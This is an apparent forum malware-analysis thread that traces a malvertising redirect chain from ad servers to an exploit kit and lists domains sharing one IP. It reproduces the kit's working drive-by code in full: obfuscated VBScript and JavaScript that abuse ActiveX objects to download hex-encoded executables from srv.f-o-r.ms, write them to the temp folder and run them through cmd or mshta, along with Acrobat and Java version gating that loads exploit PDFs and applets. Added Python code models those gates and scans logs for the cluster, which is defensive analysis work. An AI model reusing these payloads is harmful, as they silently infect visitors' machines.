Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: ads.adsrefer.net
Proxy-Connection: Keep-Alive
Decoded, the page leads to:

CODE
document.location.href='http://ads.adsrefer.net/serve/showcst?atype=b2&cid=[*]&tid=[*]&pid=[*]';

<h4>
ads.adsrefer.net
</h4>
ads.adsrefer.net/serve/showcst?atype=b2&cid=[*]&tid=[*]&pid=[*]

CODE
<script type="text/javascript" language="javascript" src="http://www.ikwlkad.net/placeholder-1780133-1389998649?atype=b2&pid=118627"></script>
</body></html>

<h4>
www.ikwlkad.net
</h4>
Decoded.
CODE
<a href="http://www.dpbolvw.net/click-2406336-10479871" target="_top"><img src="http://www.tqlkg.com/image-2406336-10479871" width="160" height="600" alt="Apple Store" border="0"/></a><script language="javascript" src="http://www.iefjios.net/placeholder-1542927-1390005885"></script>
  1. www.dpbolvw.net/click-2406336-10479871 - click target.
  2. www.tqlkg.com/image-2406336-10479871

    CODE
    The URL has moved <a href="http://www.yceml.net/0255/10479871-11.jpg">here</a>

    Banner to be displayed: www.yceml.net/0255/10479871-11.jpg

    IPB Image

  3. Link to www.iefjios.net
<h4>
www.iefjios.net
</h4>
Small change in the code compared to last time. If Adobe Acrobat isn't installed, IE will pop up a warning about a file download (PDF file).

CODE
<script language="javascript">
function blockerr() { return true; }
window.onerror = blockerr;
setInterval("window.status=' '", 100);
</script>

<script language="javascript">
var pdfrd, pdfrv, pobj, vv;

var nsplugad = navigator.plugins["Adobe Acrobat"];
if(nsplugad) {
if(nsplugad.description.indexOf("Version") > 0) {
vv = nsplugad.description.toString().split("Version ");
vv = vv[1].split(" ");
vv = vv[0].replace(/\D/g, "");
} else{ pdfrd = true; }
}

if(!pdfrd) { try {
var pobj = document.createElement("object");
pobj.classid = "clsid:CA8A9780-280D-11CF-A24D-444553540000";
if(pobj.readyState != 0) { try { pdfrv = pobj.getversions(); }catch(e){} }
} catch(e) {} }

if(!pdfrd && window.ActiveXObject) {
try { pobj = new ActiveXObject("AcroPDF.PDF"); }catch(e){}
try { pdfrv = pobj.getversions(); }catch(e){}
}

if(pdfrv && pdfrv.indexOf("Form=") != -1) {
vv = pdfrv.split("Form\="); vv = vv[1].split("\,");
vv = vv[0].replace(/\D/g, "");
}

if(vv) {
var vs = new Array();

vs[0] = parseInt(vv.charAt(0)?vv.charAt(0):0);
vs[1] = vv.charAt(1)?vv.charAt(1):0;
vs[2] = vv.charAt(2)?vv.charAt(2):0;

var vva = (vs[0] < 7);
var vvb = (vs[0] == 7 && vs[1] < 1);
var vvc = (vs[0] == 8 && vs[1] <= 1 && vs[2] <= 2);

if(vva || vvb || vvc) { pdfrd = true;  }
}

if(pdfrd) {
document.write('<iframe src="http://srv.ad-adnet.net/code/document/banner?type=1&pid=154982" frameborder="0" style="width:1px;height:1px;"></iframe>');
document.write('<iframe src="http://srv.ad-adnet.net/code/document2/banner?type=1&pid=154982" frameborder="0" style="width:1px;height:1px;"></iframe>');
}
</script>

<iframe src="http://srv.ad-adnet.net/code/document2/banner?type=1&pid=154982" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.ad-adnet.net/code/smain.php?scout=acxcrds" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.ad-adnet.net/code/smain.php?scout=acxcobj" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.ad-adnet.net/code/smain.php?scout=jvcxeng" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.ad-adnet.net/code/smain.php?scout=objmsit" frameborder="0" style="width:1px;height:1px;"></iframe>

For details about the scripts, please refer to the previous post.
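Added example (Python; this is my code, not code from the thread or from the kit): the Java version checks in the jvcxeng script of the first post and the Acrobat version checks in the www.iefjios.net script above, re-expressed as plain functions so a defender can see which installed builds this kit would have handed to which applet or PDF stage. Only the non-IE Java branch (defineffm) is modelled; the IE branch's extra clientCaps test for the Microsoft JVM is left out. The version strings fed in at the bottom are my own inputs, chosen to show the boundaries.

```python
from typing import Dict, Optional, Tuple


def _java_parts(version: str) -> Tuple[int, int, int, Optional[int]]:
    """Split '1.4.2_08' the way the script does: jvjs = split('.'), jvjss = jvjs[2].split('_').
    A missing update level is returned as None because in the script a missing jvjss[1]
    makes every numeric comparison on it evaluate to false (undefined < n is false)."""
    fields = version.split(".")
    major, minor = int(fields[0]), int(fields[1])
    rest = fields[2] if len(fields) > 2 else "0"      # assumption: pad a two-field version
    patch, _, upd = rest.partition("_")
    return major, minor, int(patch or 0), (int(upd) if upd else None)


def java_gates(version: str) -> Dict[str, bool]:
    """Which of the four applet branches (named after the jar each one loads)
    printjameth would enable for this java.version."""
    major, minor, patch, update = _java_parts(version)
    has_upd = update is not None
    return {
        # jvjs[0]!=0 && jvjs[1]<2  -> Java 1.1.x era
        "jvmmsvm": major != 0 and minor < 2,
        # (1.4.x with third field <=2 and update <6) or 1.3.x and below
        "jvmsecman": major != 0 and ((minor <= 4 and patch <= 2 and has_upd and update < 6)
                                     or minor <= 3),
        # (1.5.0 with update <2) or 1.4.x and below
        "jvmusafe": major != 0 and ((minor <= 5 and patch == 0 and has_upd and update < 2)
                                    or minor <= 4),
        # 1.5.0 with update <10, or 1.4.2 with update 6..12 (the uncommented form of the check)
        "jvmimpro": major != 0 and ((minor == 5 and patch == 0 and has_upd and update < 10)
                                    or (minor == 4 and patch == 2 and has_upd and 5 < update < 13)),
    }


def acrobat_gate(version: str) -> bool:
    """The script strips every non-digit from the version (vv.replace(/\\D/g, ""))
    and then looks only at the first three characters, so '8.1.2' becomes [8, 1, 2].
    Side effect of that parsing: a two-digit major such as 10.0 would read as major 1."""
    digits = "".join(ch for ch in version if ch.isdigit())
    vs = [int(digits[i]) if i < len(digits) else 0 for i in range(3)]
    vva = vs[0] < 7                                   # anything before 7
    vvb = vs[0] == 7 and vs[1] < 1                    # 7.0.x
    vvc = vs[0] == 8 and vs[1] <= 1 and vs[2] <= 2    # 8.0.x, 8.1.0, 8.1.1, 8.1.2
    return vva or vvb or vvc


if __name__ == "__main__":
    for v in ("1.4.2_03", "1.4.2_08", "1.5.0", "1.5.0_06", "1.6.0_07"):
        print("Java", v, "->", sorted(k for k, hit in java_gates(v).items() if hit) or "not targeted")
    for v in ("6.0", "7.0.9", "7.1.0", "8.1.2", "8.1.3", "9.0"):
        print("Acrobat", v, "->", "targeted" if acrobat_gate(v) else "ignored")
```

Running it shows the useful part for a defender: Java 6 and Acrobat 8.1.3 or 9 fall outside every gate, while a 1.4.2 build with update 6..12 is handed to two applets at once (jvmusafe and jvmimpro), which is why the author's advice to keep Java and Acrobat updated is the whole mitigation here.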
Kimberly
creative2.clicksor.com/network_1/68325/c539926096.html
serv.adtkserv.net/banner/serve?atype=b0&pid=109846
serv.adtkserv.net/banner/show?atype=b0&cid=1450335&tid=6720664321&pid=109846
www.kasdfps.net/placeholder-1489631-2880287922
srv.svc.ms/code/smain.php?scout=acxcrds
srv.svc.ms/code/smain.php?scout=acxcobj
srv.svc.ms/code/smain.php?scout=jvcxeng


serv.adtkserv.net - 85.17.162.100

Updated Date: 19-dec-2008
Creation Date: 19-dec-2008
Registrar: MONIKER ONLINE SERVICES, INC.
Name Server: NS1.DOMAINSERVICE.COM - NS2.DOMAINSERVICE.COM - NS3.DOMAINSERVICE.COM - NS4.DOMAINSERVICE.COM

srv.svc.ms - 85.17.162.100

Created: 02 Nov 2008
Modified: 02 Nov 2008
Registrar: Key-Systems
Name Servers: ns1.domainservice.com - ns3.domainservice.com - ns4.domainservice.com - ns2.domainservice.com

85.17.162.100

*.ad-adnet.net | *.adrefer.net | *.adsrefer.net | *.adteksrv.net | *.awofkwy.net | *.iefjios.net | *.iwdjiamk.net | *.kasdfps.net | *.netcrefer.net | *.tqlkg.net | *.xpseek.net | ad.adrefer.net | adnetserver.net | adpopserve.net | adpopshow.net | adrefer.net | ads.adsrefer.net | adsrefer.net | adteksrv.net | awltovhc.net | awofkwy.net | espads.net | iefjios.net | ikwlkad.net | iwdjiamk.net | kasdfps.net | kiafjwo.net | klite..ath.cx | klite.ath.cx | netcrefer.net | netcshow.net | serv.adteksrv.net | serv.netcrefer.net | srv.ad-adnet.net | tqlkg.net | www.awofkwy.net | www.iefjios.net | www.iwdjiamk.net | www.kasdfps.net | www.netcrefer.net | www.tqlkg.net | www.xpseek.net | xpseek.net

Note: banners from ads.betfair.com
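Added example (Python; my code, not from the thread): a small log-scanning routine built from what the posts above give a defender to work with, namely the hostnames shown sharing 85.17.162.100 and the path shapes of the redirect chain (servecst/showcst, placeholder-…, smain.php and srun, get?src=…). Each flagged line is tagged with the stage of the chain it represents, so one client's progression from ad redirector to exploit script to payload fetch is visible at a glance. The log format and the log lines are constructed for the demo; in practice the domain list would come from a feed rather than being hard-coded.

```python
import re
from typing import Dict, List, Set
from urllib.parse import urlsplit

# Registrable domains from the "hostnames sharing ip" lists in the posts above.
CLUSTER_DOMAINS = {
    "ad-adnet.net", "adrefer.net", "adsrefer.net", "adteksrv.net", "adtkserv.net",
    "adnetserver.net", "adpopserve.net", "adpopshow.net", "awltovhc.net",
    "awofkwy.net", "espads.net", "iefjios.net", "ikwlkad.net", "iwdjiamk.net",
    "kasdfps.net", "kiafjwo.net", "netcrefer.net", "netcshow.net", "tqlkg.net",
    "xpseek.net", "svc.ms",
}

# Path shapes seen at each stage of the chain, most specific first.
STAGES = [
    ("redirector", re.compile(r"^/(serve|banner)/(serve|show)\w*$")),   # /serve/servecst, /banner/show
    ("placeholder", re.compile(r"^/placeholder-\d+-\d+$")),
    ("exploit-script", re.compile(r"^/code/(smain\.php|srun)$")),
    ("payload", re.compile(r"^/get$|^/(xrun|xpre)\.tmp$|^/d1\.exe$")),
]


def domain_in_cluster(host: str) -> bool:
    """True when host is one of the cluster domains or a subdomain of one."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in CLUSTER_DOMAINS)


def stage_for(path: str) -> str:
    for name, pattern in STAGES:
        if pattern.match(path):
            return name
    return "unknown"


def scan_log(lines) -> List[Dict[str, str]]:
    """Constructed log format: '<timestamp> <client> <method> <url> <status>'.
    Returns one alert per line whose host belongs to the cluster."""
    alerts = []
    for line in lines:
        parts = line.split()
        if len(parts) != 5:
            continue                                    # skip malformed lines
        ts, client, _method, url, _status = parts
        parsed = urlsplit(url)
        host = parsed.hostname or ""
        if not domain_in_cluster(host):
            continue
        alerts.append({"time": ts, "client": client, "host": host,
                       "stage": stage_for(parsed.path)})
    return alerts


def clients_reaching_exploit(alerts) -> Set[str]:
    """Clients that got past the advert and placeholder and fetched exploit code or a payload."""
    return {a["client"] for a in alerts if a["stage"] in ("exploit-script", "payload")}


# Constructed sample: one client walks the chain, another only browses an unrelated site.
SAMPLE_LOG = """\
2009-01-20T10:15:01 10.0.0.5 GET http://creative.clicksor.com/network_1020/498/c212999415.html 200
2009-01-20T10:15:02 10.0.0.5 GET http://ads.adsrefer.net/serve/servecst?atype=b2&pid=118627 200
2009-01-20T10:15:02 10.0.0.5 GET http://www.ikwlkad.net/placeholder-1780133-1389998649?atype=b2&pid=118627 200
2009-01-20T10:15:03 10.0.0.5 GET http://srv.ad-adnet.net/code/smain.php?scout=acxcrds 200
2009-01-20T10:15:04 10.0.0.5 GET http://srv.ad-adnet.net/get?src=xrun 200
2009-01-20T10:15:07 10.0.0.9 GET http://www.example.com/index.html 200
2009-01-20T10:15:09 10.0.0.9 GET http://www.lduhtrp.net/image-2406336-10479732 302
"""

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG.splitlines())
    for a in hits:
        print(f'{a["time"]} {a["client"]} {a["stage"]:15} {a["host"]}')
    print("clients reaching exploit or payload stage:", clients_reaching_exploit(hits))
```

Note that the clicksor request itself is not flagged: the ad network is the abused platform, not part of the cluster, so the first line that matches is the ads.adsrefer.net redirector, which is also the earliest point at which blocking the cluster domains at the proxy stops the chain.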
Kimberly
<h4>
Start at ad3.clickhype.com
</h4>
ad3.clickhype.com/servlet/view/banner/javascript/zone?zid=[*]0&pid=[*]&random=[*]&millis=[*]
sv.adsserve.net/serve/serveiad?atype=b6&pid=[*]
sv.adsserve.net/serve/showiad?atype=b6&pid=[*]&cid=[*]&tid=[*]
www.soarnxec.net/placeholder-1279416-422086074?atype=b6&pid=[*]
sv.adsserve.net/serve/serveiad?atype=b4&pid=[*]
www.kiafjwo.net/placeholder-1188843-422097801
serv.adsserve.net/sva/content
sv.adsserve.net/serve/showiad?atype=b4&pid=[*]&cid=[*]&tid=[*]
srv.f-o-r.ms/code/smain.php?scout=acxcrds
srv.f-o-r.ms/code/smain.php?scout=acxcobj
srv.f-o-r.ms/code/smain.php?scout=jvcxeng
srv.f-o-r.ms/code/srun
srv.f-o-r.ms/code/srun?req
srv.f-o-r.ms/code/document/banner?type=1&pid=154982

______________________________

www.kiafjwo.net/placeholder-1188843-422097801
CODE
<img src="http://fc.webmasterpro.de/as_noscript.php?name=na" style="width:1px;height:1px;border:0px;display:none;">

<script language="javascript">
function blockerr() { return true; }
window.onerror = blockerr;
setInterval("window.status=' '", 100);
</script>

<script language="javascript">
var pdfrd, pdfrv, pobj, vv;

var nsplugad = navigator.plugins["Adobe Acrobat"];
if(nsplugad) {
if(nsplugad.description.indexOf("Version") > 0) {
vv = nsplugad.description.toString().split("Version ");
vv = vv[1].split(" ");
vv = vv[0].replace(/\D/g, "");
} else{ pdfrd = true; }
}

if(!pdfrd) { try {
var pobj = document.createElement("object");
pobj.classid = "clsid:CA8A9780-280D-11CF-A24D-444553540000";
if(pobj.readyState != 0) { try { pdfrv = pobj.getversions(); }catch(e){} }
} catch(e) {} }

if(!pdfrd && window.ActiveXObject) {
try { pobj = new ActiveXObject("AcroPDF.PDF"); }catch(e){}
try { pdfrv = pobj.getversions(); }catch(e){}
}

if(pdfrv && pdfrv.indexOf("Form=") != -1) {
vv = pdfrv.split("Form\="); vv = vv[1].split("\,");
vv = vv[0].replace(/\D/g, "");
}

if(vv) {
var vs = new Array();

vs[0] = parseInt(vv.charAt(0)?vv.charAt(0):0);
vs[1] = vv.charAt(1)?vv.charAt(1):0;
vs[2] = vv.charAt(2)?vv.charAt(2):0;

var vva = (vs[0] < 7);
var vvb = (vs[0] == 7 && vs[1] < 1);
var vvc = (vs[0] == 8 && vs[1] <= 1 && vs[2] <= 2);

if(vva || vvb || vvc) { pdfrd = true;  }
}

if(pdfrd) {
document.write('<iframe src="http://srv.f-o-r.ms/code/document/banner?type=1&pid=154982" frameborder="0" style="width:1px;height:1px;"></iframe>');
document.write('<iframe src="http://srv.f-o-r.ms/code/document/banner?type=2&pid=154982" frameborder="0" style="width:1px;height:1px;"></iframe>');
}
</script>
<object type="application/pdf" data="http://srv.f-o-r.ms/code/document/banner?type=1&pid=154982">
<embed src="http://srv.f-o-r.ms/code/document/banner?type=1&pid=154982"></embed>
</object>

<iframe src="http://srv.f-o-r.ms/code/smain.php?scout=acxcrds" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.f-o-r.ms/code/smain.php?scout=acxcobj" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.f-o-r.ms/code/smain.php?scout=jvcxeng" frameborder="0" style="width:1px;height:1px;"></iframe>
srv.f-o-r.ms/code/smain.php?scout=acxcrds
CODE
<script language="VBScript">
on error resume next

Function DownExRdsDsc(source, target)
on error resume next
Dim cobj, xobj, eobj, sobj, tfld, eloc, tfile, response, bindata, i, x

Set cobj = document.createElement("object")
cobj.setAttribute "classid", Unescape("%"+"63%6c%73%69%64%3a%42%44%"+"39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%36")

If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%6e%"+"48%74%74%70%2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74%2e%35%2e%31"),"")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%6e%48%74%74%70%"+"2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74"),"")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"4d%69%63%72%6f%"+"73%6f%66%74%2e%58%4d%4c%48%54%54%50"),"")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"4d%53%58%4d%4c%32%2e%58%"+"4d%4c%48%54%54%50"),"")
Set eobj = cobj.CreateObject(Unescape("%"+"53%68%65%"+"6c%6c%2e%41%70%70%6c%69%63%61%74%69%6f%6e"),"")
Set sobj = cobj.CreateObject(Unescape("%"+"53%63%72%69%70%74%"+"69%6e%67%2e%46%69%6c%65%53%79%73%74%65%6d%4f%62%6a%65%63%74"),"")

If VarType(xobj) And VarType(eobj) And VarType(sobj) Then
xobj.Open "GET", source, False
xobj.setRequestHeader "Request", "smain"
xobj.Send
response = xobj.responseText

If Len(response) > 1 And InStr(LCase(response), "<html>") = 0 Then

Set tfld = sobj.GetSpecialFolder(2)
eloc = sobj.BuildPath(tfld, target & ".tmp")

If sobj.FileExists(eloc) = False Then

    Set tfile = sobj.CreateTextFile(eloc, True)

    Dim ss, sn, sp, sd(), bd()
    ss = Len(response)
    sn = 10000
    
    sp = Int(ss / sn)
    ReDim sd(sp), bd(sp)

    For i = 0 To sp
        sd(i) = Mid(response, (i*sn)+1, sn)
        For x = 1 To Len(sd(i)) Step 2
        bd(i) = bd(i) & Chr("&H" & Mid(sd(i), x, 2))
        Next
        tfile.Write bd(i)
    Next

    tfile.Close
End If

End If

If sobj.FileExists(eloc) Then
If VarType(eobj) = vbObject Then
eobj.ShellExecute "cmd", " /c start """" """ & eloc & """", "", "open", 0
Else wobj.run "cmd /c start """" """ & eloc & """", 0
End If
End If

End If
End Function

Call DownExRdsDsc("http://srv.f-o-r.ms/get?src=xrun", "oswemaxrnc")
Call DownExRdsDsc("http://srv.f-o-r.ms/get?src=xpre", "wecxsanrmo")
</script>
srv.f-o-r.ms/code/smain.php?scout=acxcobj
CODE
<script language="javascript">
var a = false; var b = false;
try { var a = document.createElement("object"); }catch(e){}
if(a) { try { a.setAttribute("classid", unescape("%"+"63%6c%73%69%64%"+"3a%42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%36")); }catch(e){} }
if(a) { try { var b = a.CreateObject(unescape("%"+"57%53%"+"63%72%69%70%74%2e%53%68%65%6c%6c"),""); }catch(e){} }
if(b) { try { b.run("mshta http://srv.f-o-r.ms/code/srun", 0); }catch(e){} }

var a = false; var b = false;
try { var a = document.createElement("object"); }catch(e){}
if(a) { try { a.setAttribute("classid", unescape("%"+"63%6c%73%69%64%3a%"+"41%42%39%42%43%45%44%44%2d%45%43%37%45%2d%34%37%45%31%2d%39%33%32%32%2d%44%34%41%32%31%30%36%31%37%31%31%36")); }catch(e){} }
if(a) { try { var b = a.CreateObject(unescape("%"+"57%53%63%72%69%70%74%"+"2e%53%68%65%6c%6c")); }catch(e){} }
if(b) { try { b.run("mshta http://srv.f-o-r.ms/code/srun", 0); }catch(e){} }

var a = false;
try { var a = document.createElement("object"); }catch(e){}
if(a) { try { a.setAttribute("classid", unescape("%"+"63%6c%73%69%"+"64%3a%30%33%35%35%38%35%34%41%2d%37%46%32%33%2d%34%37%45%32%2d%42%37%43%33%2d%39%37%45%45%38%44%44%34%32%43%44%38")); }catch(e){} }
if(a) { try { a.RunApplication(1, "mshta http://srv.f-o-r.ms/code/srun", 1); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject(unescape("%"+"54%78%43%74%78%2e%54%"+"72%61%6e%73%61%63%74%69%6f%6e%43%6f%6e%74%65%78%74")); }catch(e){}
if(a) { try { var b = a.CreateInstance(unescape("%"+"57%53%63%72%69%70%"+"74%2e%53%68%65%6c%6c")); }catch(e){} }
if(b) { try { b.run("mshta http://srv.f-o-r.ms/code/srun", 0); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject(unescape("%"+"57%4d%49%53%63%72%"+"69%70%74%55%74%69%6c%73%2e%57%4d%49%4f%62%6a%65%63%74%42%72%6f%6b%65%72%32")); }catch(e){}
if(a) { try { var b = a.CreateObject(unescape("%"+"57%53%63%"+"72%69%70%74%2e%53%68%65%6c%6c")); }catch(e){} }
if(b) { try { b.run("mshta http://srv.f-o-r.ms/code/srun", 0); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject(unescape("%"+"4f%75%74%6c%6f%6f%6b%"+"2e%41%70%70%6c%69%63%61%74%69%6f%6e")); }catch(e){}
if(a) { try { var b = a.CreateObject(unescape("%"+"57%53%63%"+"72%69%70%74%2e%53%68%65%6c%6c")); }catch(e){} }
if(b) { try { b.run("mshta http://srv.f-o-r.ms/code/srun", 0); }catch(e){} }

var a = false;
try { var a = new ActiveXObject(unescape("%"+"57%53%63%72%69%70%74%2e%"+"53%68%65%6c%6c")); }catch(e){}
if(a) { try { a.run("mshta http://srv.f-o-r.ms/code/srun", 0); }catch(e){} }
</script>

<script language="VBScript">
on error resume next

Function DownExAxObj(source, target)
on error resume next
Dim cobj, wobj, eobj, sobj, xobj, tfld, eloc, tfile, response, bindata, i, x

if VarType(cobj) <> vbObject Then Set cobj = CreateObject(Unescape("%"+"4f%75%74%6c%6f%6f%6b%"+"2e%41%70%70%6c%69%63%61%74%69%6f%6e"))
if VarType(cobj) <> vbObject Then Set cobj = CreateObject(Unescape("%"+"57%4d%49%53%"+"63%72%69%70%74%55%74%69%6c%73%2e%57%4d%49%4f%62%6a%65%63%74%42%72%6f%6b%65%72%32"))

Set wobj = cobj.CreateObject(Unescape("%"+"57%53%63%72%69%70%"+"74%2e%53%68%65%6c%6c"))
Set sobj = cobj.CreateObject(Unescape("%"+"53%63%72%69%70%74%69%"+"6e%67%2e%46%69%6c%65%53%79%73%74%65%6d%4f%62%6a%65%63%74"))

If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%6e%48%74%74%70%"+"2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74%2e%35%2e%31"),"")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%6e%48%"+"74%74%70%2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74"),"")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"4d%69%63%"+"72%6f%73%6f%66%74%2e%58%4d%4c%48%54%54%50"))
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"4d%53%58%4d%4c%32%2e%58%"+"4d%4c%48%54%54%50"))

xobj.Open "GET", source, False
xobj.setRequestHeader "Request", "smain"
xobj.Send
response = xobj.responseText

If Len(response) > 1 And InStr(LCase(response), "<html>") = 0 Then

Set tfld = sobj.GetSpecialFolder(2)
eloc = sobj.BuildPath(tfld, target & ".tmp")

If sobj.FileExists(eloc) = False Then
    
    Set tfile = sobj.CreateTextFile(eloc, True)

    Dim ss, sn, sp, sd(), bd()
    ss = Len(response)
    sn = 10000
    
    sp = Int(ss / sn)
    ReDim sd(sp), bd(sp)

    For i = 0 To sp
        sd(i) = Mid(response, (i*sn)+1, sn)
        For x = 1 To Len(sd(i)) Step 2
        bd(i) = bd(i) & Chr("&H" & Mid(sd(i), x, 2))
        Next
        tfile.Write bd(i)
    Next

    tfile.Close
End If

End If

wobj.run "cmd /c start """" """ & eloc & """", 0
End Function

Call DownExAxObj("http://srv.f-o-r.ms/get?src=xrun", "nmewxcrsao")
Call DownExAxObj("http://srv.f-o-r.ms/get?src=xpre", "xceamrsonw")
</script>
srv.f-o-r.ms/code/smain.php?scout=jvcxeng
CODE
<script language="javascript">
if(navigator.javaEnabled()) {

var jvmmsvm, jvmsec, jvmusafe, jvmiproc;
var i=0; var x=0; var z=0;
if(navigator.appName.toLowerCase().indexOf("microsoft") != -1) {

// Get Clientcaps version
try {
oClientCaps = document.createElement("div");
oClientCaps.style.behavior = "url(#default#clientCaps)";
}catch(e){}

function GetVersion(CLSID) { try {
if(oClientCaps.isComponentInstalled(CLSID,"ComponentID")) {
return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");
} else { return Array(0,0,0,0); }
}catch(e){} }
      
var jvoc  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");

// Get JavaApplet version
var jvmverm = document.createElement("applet");
jvmverm.archive = "jvmvers.jar";
jvmverm.code = "vmain.class";
jvmverm.width = "1"; jvmverm.height = "1";
document.body.appendChild(jvmverm);

//window.onload = definemsm;
function jvloadc() { i = i+1;
if(jvmverm.jversion || (typeof jvmverm.jversion != "undefined")) { definemsm(); }
else if(i < 30) { setTimeout("jvloadc()", 300); }
} setTimeout("jvloadc()", 300);

function definemsm() { try {
var jvjm, jvjv, jvja, sjmsjvm, sjsecmn, sjusafe, sjiproc;
try{ jvjm = jvmverm.jversion+""; jvjv = jvmverm.jvendor+""; }catch(e){}
if(jvjm.indexOf(".") == -1) { jvja = false; } else { jvja = jvjm.split("."); }
if(!jvja) { jvja = Array(0,0,"0_0"); }
var jvjas = jvja[2].split("_");
if((jvoc[0]!=0) && (jvoc[2]<3810) && ((jvja[1]<2) || (jvja[0]==0)) && (jvjv.indexOf("Microsoft") != -1)) { sjmsjvm = true; } else { sjmsjvm = false; }
if((jvja[0]!=0) && (((jvja[1]<=4) && (jvjas[0]<=2) && (jvjas[1]<06)) || (jvja[1]<=3))) { sjsecmn = true; } else { sjsecmn = false; }
if((jvja[0]!=0) && (((jvja[1]<=5) && (jvjas[0]==0) && (jvjas[1]<2)) || (jvja[1]<=4))) { sjusafe = true; } else { sjusafe = false; }
//if((jvja[0]!=0) && (((jvja[1]<=5) && (jvjas[0]==0) && (jvjas[1]<10)) || (jvja[1]<=4))) { sjiproc = true; } else { sjiproc = false; }
if((jvja[0]!=0) && (((jvja[1]==5) && (jvjas[0]==0) && (jvjas[1]<10)) || ((jvja[1]==4) && (jvjas[0]==2) && (jvjas[1]>5) && (jvjas[1]<13)))) { sjiproc = true; } else { sjiproc = false; }
printjameth(jvja, sjmsjvm, sjsecmn, sjusafe, sjiproc);
}catch(e){} }

} else {
// Non ie browsers

// Get Script version
try {
var jvjs = java.lang.System.getProperty("java.version")+"";
if(jvjs.indexOf(".") == -1) { jvjs = false; } else { jvjs = jvjs.split("."); }
}catch(e) {}

// Get Plugin version
if((!jvjs) && navigator.plugins["Java Plug-in"]) { try {
var jpd = navigator.plugins["Java Plug-in"].description;
var jvjs = jpd.substring(jpd.indexOf("1"),jpd.indexOf(" ", jpd.indexOf("1")));
if(jvjs.indexOf(".") == -1) { jvjs = false; } else { jvjs = jvjs.split("."); }
}catch(e) {} }

// Get JavaApplet Version
if(!jvjs) {
var jvmverf = document.createElement("applet");
jvmverf.archive = "jvmvers.jar";
jvmverf.code = "vmain.class";
jvmverf.width = "1"; jvmverf.height = "1";
document.body.appendChild(jvmverf);
}

if(!jvjs) {
function jvloadfc() { i = i+1;
if(jvmverf.jversion) { defineffm(); }
else if(i < 30) { setTimeout("jvloadfc()", 300); }
} setTimeout("jvloadfc()", 300);
} else { setTimeout("defineffm()", 100); }

function defineffm() { try {
var sjmsjvm, sjsecmn, sjusafe, sjiproc;
if(!jvjs) { try{ var jvjj = jvmverf.jversion+""; jvjs = jvjj.split("."); }catch(e) {} }
if(jvjs) {
var jvjss = jvjs[2].split("_");
if((jvjs[0]!=0) && (jvjs[1]<2)) { var sjmsjvm = true; } else { sjmsjvm = false; }
if((jvjs[0]!=0) && (((jvjs[1]<=4) && (jvjss[0]<=2) && (jvjss[1]<06)) || (jvjs[1]<=3))) { sjsecmn = true; } else { sjsecmn = false; }
if((jvjs[0]!=0) && (((jvjs[1]<=5) && (jvjss[0]==0) && (jvjss[1]<2)) || (jvjs[1]<=4))) { sjusafe = true; } else { sjusafe = false; }
//if((jvjs[0]!=0) && (((jvjs[1]<=5) && (jvjss[0]==0) && (jvjss[1]<10)) || (jvjs[1]<=4))) { sjiproc = true; } else { sjiproc = false; }
if((jvjs[0]!=0) && (((jvjs[1]==5) && (jvjss[0]==0) && (jvjss[1]<10)) || ((jvjs[1]==4) && (jvjss[0]==2) && (jvjss[1]>5) && (jvjss[1]<13)))) { sjiproc = true; } else { sjiproc = false; }
printjameth(jvjs, sjmsjvm, sjsecmn, sjusafe, sjiproc);
}
}catch(e) {} }

} // End Else Not IE

function printjameth(jvers, sjmsjvm, sjsecmn, sjusafe, sjiproc) { try {
//alert("JVERSION: "+jvers+" MSJVM: "+sjmsjvm+" SECMAN: "+sjsecmn+" USAFE: "+sjusafe+" IMPRO: "+sjiproc);

if(sjmsjvm) {
jvmmsvm = document.createElement("applet");
jvmmsvm.archive = "jvmmsvm.jar";
jvmmsvm.code = "vmain.class";
jvmmsvm.width = "1"; jvmmsvm.height = "1";
var jvmmsvp = document.createElement("param");
jvmmsvp.name = "sdata";
jvmmsvp.value = "http://srv.f-o-r.ms/xrun.tmp;http://srv.f-o-r.ms/xpre.tmp";
jvmmsvm.appendChild(jvmmsvp);
document.body.appendChild(jvmmsvm);
}

if(sjsecmn) {
jvmsec = document.createElement("applet");
jvmsec.archive = "jvmsecman.jar";
jvmsec.code = "vmain.class";
jvmsec.width = "1"; jvmsec.height = "1";
document.body.appendChild(jvmsec);
setTimeout("sjvsecc()", 300);
}

if(sjusafe) {
jvmusafe = document.createElement("applet");
jvmusafe.archive = "jvmusafe.jar";
jvmusafe.code = "vmain.class";
jvmusafe.width = "1"; jvmusafe.height = "1";
document.body.appendChild(jvmusafe);
setTimeout("sjvusafc()", 300);
}

if(sjiproc) {
